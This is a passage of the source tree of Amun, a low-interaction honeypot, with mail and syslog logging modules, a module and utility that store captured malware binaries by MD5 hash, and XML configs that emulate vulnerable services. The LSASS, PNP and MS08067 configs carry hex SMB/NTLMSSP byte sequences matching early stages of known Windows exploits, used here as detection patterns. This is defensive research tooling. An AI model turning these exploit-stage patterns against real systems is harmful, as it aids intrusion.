27 | 			conffile = "conf/log-mail.conf"
28 | 			config = amun_config_parser.AmunConfigParser(conffile)
29 | 			self.smtpServer = config.getSingleValue("smtpServer")
30 | 			self.smtpPort = int(config.getSingleValue("smtpPort"))
31 | 			self.mailFrom = config.getSingleValue("mailFrom")
32 | 			self.mailReplyTo = config.getSingleValue("mailReplyTo")
33 | 			if self.mailReplyTo == "None":
34 | 				self.mailReplyTo = ""
35 | 			self.RecipientList = config.getSingleValue("recipientList").split(',')
36 | 			if self.RecipientList == "None":
37 | 				self.RecipientList = ""
38 | 			self.mailCCList = config.getSingleValue("mailCCList").split(',')
39 | 			if self.mailCCList == "None":
40 | 				self.mailCCList = ""
41 | 			self.mailBody = config.getSingleValue("mailBody").replace('\\n','\n').replace('\\t','\t')
42 | 			del config
43 | 		except KeyboardInterrupt:
44 | 			raise
45 | 
46 | 	def initialConnection(self, attackerIP, attackerPort, victimIP, victimPort, identifier, initialConnectionsDict, loLogger):
47 | 		pass
48 | 
49 | 	def incoming(self, attackerIP, attackerPort, victimIP, victimPort, vulnName, timestamp, downloadMethod, loLogger, attackerID, shellcodeName):
50 | 		try:
51 | 			self.log_obj = amun_logging.amun_logging("log_mail", loLogger)
52 | 			### construct message header
53 | 			### From, To, and Subject
54 | 			Subject = "Amun Exploit from: %s" % (attackerIP)
55 | 			RecipientRow = ",".join(self.RecipientList)
56 | 			MessageHeader = "From: %s\r\nTo: %s\r\nSubject: %s \r\n" % (self.mailFrom,RecipientRow,Subject)
57 | 			### If ReplyTo is set, add to header
58 | 			if self.mailReplyTo!="":
59 | 				MessageHeader += "ReplyTo: %s\r\n" % (self.mailReplyTo)
60 | 			if len(self.mailCCList)>0:
61 | 				MessageHeader += "CC: %s\r\n" % (",".join(self.mailCCList))
62 | 			### set character encoding
63 | 			charencode = "Content-Type: text/plain; charset=iso-8859-1"
64 | 			MessageHeader += "%s\r\n" % (charencode)
65 | 			### finalize Message Header
66 | 			MessageHeader += "\r\n"
67 | 			### eMail Body
68 | 			MailBody = self.mailBody
69 | 			ExploitLine = "\n\nTimestamp: %s\nExploit: %s:%s -> %s:%s %s (%s)" % (time.ctime(int(timestamp)),attackerIP,attackerPort,victimIP,victimPort,vulnName,downloadMethod)
70 | 			### construct final eMail
71 | 			Message = str(MessageHeader) + str(MailBody) + str(ExploitLine)
72 | 			### connect to mailserver and send email
73 | 			try:
74 | 				Server = smtplib.SMTP(self.smtpServer,int(self.smtpPort))
75 | 				Server.set_debuglevel(0)
76 | 				Server.sendmail(self.mailFrom, self.RecipientList, Message)
77 | 				Server.quit()
78 | 			except:
79 | 				self.log_obj.log("failed sending email message", 12, "crit", Log=True, display=True)
80 | 		except KeyboardInterrupt:
81 | 			raise
82 | 
83 | 	def successfullSubmission(self, attackerIP, attackerPort, victimIP, downloadURL, md5hash, data, filelength, downMethod, loLogger, vulnName, fexists):
84 | 		pass
85 | 


--------------------------------------------------------------------------------
/log_modules/log-syslog/log_syslog.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import time
19 | import amun_logging
20 | import syslog
21 | 
22 | 
23 | class log:
24 | 	def __init__(self):
25 | 		try:
26 | 			self.log_name = "Log Syslog"
27 | 		except KeyboardInterrupt:
28 | 			raise
29 | 
30 | 	def initialConnection(self, attackerIP, attackerPort, victimIP, victimPort, identifier, initialConnectionsDict, loLogger):
31 | 		pass
32 | 
33 | 	def incoming(self, attackerIP, attackerPort, victimIP, victimPort, vulnName, timestamp, downloadMethod, loLogger, attackerID, shellcodeName):
34 | 		try:
35 | 			self.log_obj = amun_logging.amun_logging("log_syslog", loLogger)
36 | 			syslog_message = "Exploit: %s -> %s:%s %s (%s)" % (attackerIP,victimIP,victimPort,vulnName,downloadMethod)
37 | 			syslog.openlog('Amun',syslog.LOG_PID,syslog.LOG_LOCAL4)
38 | 			syslog.syslog(syslog.LOG_WARNING, syslog_message)
39 | 			syslog.closelog()
40 | 		except KeyboardInterrupt:
41 | 			raise
42 | 
43 | 	def successfullSubmission(self, attackerIP, attackerPort, victimIP, downloadURL, md5hash, data, filelength, downMethod, loLogger, vulnName, fexists):
44 | 		pass
45 | 


--------------------------------------------------------------------------------
/malware/md5sum/.empty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/malware/md5sum/.empty


--------------------------------------------------------------------------------
/submit_modules/submit-md5/submit_md5.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import os
19 | import amun_logging
20 | 
21 | # 69 6c 6c 65  67 61 6c 20 54 46 54 50 20 6f 70 65 72 61 74 69  6f 6e 2e 00
22 | 
23 | class submit(object):
24 | 	__slots__ = ("submit_name", "log_obj")
25 | 
26 | 	def __init__(self):
27 | 		try:
28 | 			self.submit_name = "Submit MD5"
29 | 			if not os.path.exists('malware/md5sum'):
30 | 				os.makedirs('malware/md5sum')
31 | 		except KeyboardInterrupt:
32 | 			raise
33 | 
34 | 	def incoming(self, file_data, file_data_length, downMethod, attIP, victimIP, smLogger, md5hash, attackedPort, vulnName, downURL, fexists):
35 | 		try:
36 | 			self.log_obj = amun_logging.amun_logging("submit_md5", smLogger)
37 | 
38 | 			### store to disc
39 | 			filename = "malware/md5sum/%s.bin" % (md5hash)
40 | 			if not fexists:
41 | 				fp = open(filename, 'a+b')
42 | 				fp.write(file_data)
43 | 				fp.close()
44 | 				self.log_obj.log("download (%s): %s (size: %i) - %s" % (downURL, md5hash, file_data_length, vulnName.replace(' Vulnerability','')), 12, "div", Log=True, display=True)
45 | 			else:
46 | 				self.log_obj.log("file exists", 12, "crit", Log=False, display=False)
47 | 		except KeyboardInterrupt:
48 | 			raise
49 | 


--------------------------------------------------------------------------------
/utils/cut_file.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | """
 4 | [Amun - low interaction honeypot]
 5 | Copyright (C) [2014]  [Jan Goebel]
 6 | 
 7 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
10 | 
11 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
12 | """
13 | 
14 | import md5
15 | import os
16 | import sys
17 | 
18 | def write_md5(file_data, file_data_length):
19 | 	hash = md5.new(file_data)
20 | 	fname = hash.hexdigest()
21 | 	filename = "unknown-%s.bin" % (fname)
22 | 	if not os.path.exists(filename):
23 | 		fp = open(filename, 'a+')
24 | 		fp.write(file_data)
25 | 		fp.close()
26 | 		print "successfull write: %s (size: %s)" % (filename, file_data_length)
27 | 	else:
28 | 		print "file exists"
29 | 
30 | def check_file(data, data_length):
31 | 	i = 0
32 | 	found = False
33 | 	if data[i]=='\x4d' and data[i+1]=='\x5a':
34 | 		return data,data_length
35 | 	while i <= data_length-4:
36 | 		if data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x90' and data[i+3]=='\x00' and data[i+4]=='\x03':
37 | 			found = True
38 | 			break
39 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x50' and data[i+3]=='\x00' and data[i+4]=='\x02':
40 | 			found = True
41 | 			break
42 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x4b' and data[i+3]=='\x45' and data[i+4]=='\x52':
43 | 			found = True
44 | 			break
45 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x66' and data[i+3]=='\x61' and data[i+4]=='\x72':
46 | 			found = True
47 | 			break
48 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x00' and data[i+3]=='\x00' and data[i+4]=='\x00':
49 | 			found = True
50 | 			break
51 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x90' and data[i+3]=='\xeb' and data[i+4]=='\x01':
52 | 			found = True
53 | 			break
54 | 		elif data[i]=='\x4d' and data[i+1]=='\x5a' and data[i+2]=='\x4c' and data[i+3]=='\x6f' and data[i+4]=='\x61':
55 | 			found = True
56 | 			break
57 | 		i += 1
58 | 	if i>0 and found:
59 | 		print "cutting header (size: %i)" % (i)
60 | 		data = data[i:]
61 | 		data_length = len(data)
62 | 	return data,data_length
63 | 
64 | 
65 | if __name__ == "__main__":
66 | 	filename = sys.argv[1]
67 | 	print "reading file %s ... " % (filename),
68 | 	fp = open(filename, 'r')
69 | 	content = "".join(fp.readlines())
70 | 	fp.close()
71 | 	print "done."
72 | 	content_len = len(content)
73 | 	print "checking file ... "
74 | 	(newfile, newlen) = check_file(content, content_len)
75 | 	write_md5(newfile, newlen)
76 | 


--------------------------------------------------------------------------------
/utils/listIPs.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import popen2
 4 | import re
 5 | 
 6 | 
 7 | if __name__ == '__main__':
 8 | 	print "Try to get all assigned IP addresses:"
 9 | 	try:
10 | 		t = re.compile("inet (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/");
11 | 		counter = 0
12 | 		ipListe = []
13 | 		command = "ip addr show eth0"
14 | 		child = popen2.Popen4(command)
15 | 		line = child.fromchild.readline()
16 | 		while line:
17 | 			line = str(line).strip()
18 | 			match = t.search(line)
19 | 			if match:
20 | 				#print "\t%s" % (match.groups()[0])
21 | 				ipListe.append(str(match.groups()[0]).strip())
22 | 				counter += 1
23 | 			line = child.fromchild.readline()
24 | 		child.wait()
25 | 		print counter
26 | 		print ipListe[0]
27 | 	except KeyboardInterrupt:
28 | 		pass
29 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_arc.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>ARC</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>6070</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_arkeia.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>ARKEIA</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>617</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_bagle.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>BAGLE</Name>
 4 | 		<Stages>2</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>2745</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_ca.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>CA</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>10203</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_dameware.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>DAMEWARE</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>6129</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_ftpd.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>FTPD</Name>
 4 | 		<Stages>2</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>21</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>220 OK</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_helix.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>HELIX</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>554</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_http.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>HTTP</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>80</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>\x00</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_iis.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>IIS</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>443</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>\x00</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_imail.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>IMAIL</Name>
 4 | 		<Stages>2</Stages>
 5 | 		<WelcomeMess>220 mail.example.com SMTP Amun Mailserver</WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>25</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_lsass.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>LSASS</Name>
 4 | 		<Stages>6</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>445</Port>
 8 | 			<Port>135</Port>
 9 | 		</Ports>
10 | 		<DefaultReply>\x00</DefaultReply>
11 | 	</Init>
12 | 	<Stages>
13 | 		<Stage stage="1">
14 | 			<ReadBytes>137</ReadBytes>
15 | 			<Reply position="9">\x00</Reply>
16 | 			<Request>\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00</Request>
17 | 		</Stage>
18 | 		<Stage stage="2">
19 |                         <ReadBytes>168</ReadBytes>
20 |                         <Reply position="9">\x00</Reply>
21 | 			<Request>\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00</Request>
22 |                 </Stage>
23 | 		<Stage stage="3">
24 | 			<ReadBytes>222</ReadBytes>
25 | 			<Reply position="48">W i n d o w s  5 . 1 </Reply>
26 | 			<Request>\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48\x00\x4F\x00\x44\x00\x00\x81\x19\x6A\x7A\xF2\xE4\x49\x1C\x28\xAF\x30\x25\x74\x10\x67\x53\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00</Request>
27 | 		</Stage>
28 | 
29 | 		<Stage stage="5">
30 | 			<ReadBytes>104</ReadBytes>
31 | 			<Request>\x00\x00\x00\x64\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x0E\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x02\x00\x00\x00\x03\x11\x00\x00\x5C\x00\x6C\x00\x73\x00\x61\x00\x72\x00\x70\x00\x63\x00\x00\x00</Request>
32 | 		</Stage>
33 | 		<Stage stage="6">
34 | 			<ReadBytes>160</ReadBytes>
35 | 			<Request>\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02\x00\x26\x00\x00\x40\x59\x00\x10\x5C\x00\x50\x00\x49\x00\x50\x00\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x6A\x28\x19\x39\x0C\xB1\xD0\x11\x9B\xA8\x00\xC0\x4F\xD9\x2E\xF5\x00\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00</Request>
36 | 		</Stage>
37 | 	</Stages>
38 | </Vulnerability>
39 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_maxdb.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>MaxDB</Name>
 4 | 		<Stages>2</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>9999</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>\x00</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_mercurymail.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>MERCURY</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>105</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>\x00</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_ms08067.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>MS08067</Name>
 4 | 		<Stages>9</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>445</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | 	<Stages>
12 | 		<Stage stage="1">
13 | 			<ReadBytes>221</ReadBytes>
14 | 			<Reply>\x00\x00\x00\x55\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x01\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xaa\x00\x00\xc6\xa3\x11\x03\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x00\x67\xd9\x26\x46\xad\x3d\xc9\x01\xc4\xff\x00\x10\x00\xcf\x93\x98\x87\x52\x1d\x7c\x42\x9a\xed\x0f\x24\x73\xdb\x5c\x46</Reply>
15 | 			<Request></Request>
16 | 		</Stage>
17 | 		<Stage stage="2">
18 |                         <ReadBytes>168</ReadBytes>
19 |                         <Reply></Reply>
20 | 			<Request></Request>
21 |                 </Stage>
22 | 		<Stage stage="3">
23 | 			<ReadBytes>222</ReadBytes>
24 | 			<Reply></Reply>
25 | 			<Request></Request>
26 | 		</Stage>
27 | 		<Stage stage="4">
28 | 			<ReadBytes></ReadBytes>
29 | 			<Reply></Reply>
30 | 			<Request></Request>
31 | 		</Stage>
32 | 		<Stage stage="5">
33 | 			<ReadBytes>104</ReadBytes>
34 | 			<Request></Request>
35 | 		</Stage>
36 | 		<Stage stage="6">
37 | 			<ReadBytes>160</ReadBytes>
38 | 			<Request></Request>
39 | 		</Stage>
40 | 	</Stages>
41 | </Vulnerability>
42 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_msmq.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>MSMQ</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>2103</Port>
 8 | 			<Port>2105</Port>
 9 | 			<Port>2107</Port>
10 | 		</Ports>
11 | 	</Init>
12 | </Vulnerability>
13 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_openview.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>HPOpenView</Name>
 4 | 		<Stages>1</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>2954</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_pnp.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>PNP</Name>
 4 | 		<Stages>6</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>445</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | 	<Stages>
12 | 		<Stage stage="1">
13 | 			<ReadBytes>137</ReadBytes>
14 | 			<Reply position="9">\x00</Reply>
15 | 			<Request>\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00</Request>
16 | 		</Stage>
17 | 		<Stage stage="2">
18 |                         <ReadBytes>168</ReadBytes>
19 |                         <Reply position="9">\x00</Reply>
20 | 			<Request>\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00</Request>
21 |                 </Stage>
22 | 		<Stage stage="3">
23 | 			<ReadBytes>222</ReadBytes>
24 | 			<Reply position="9">\x00</Reply>
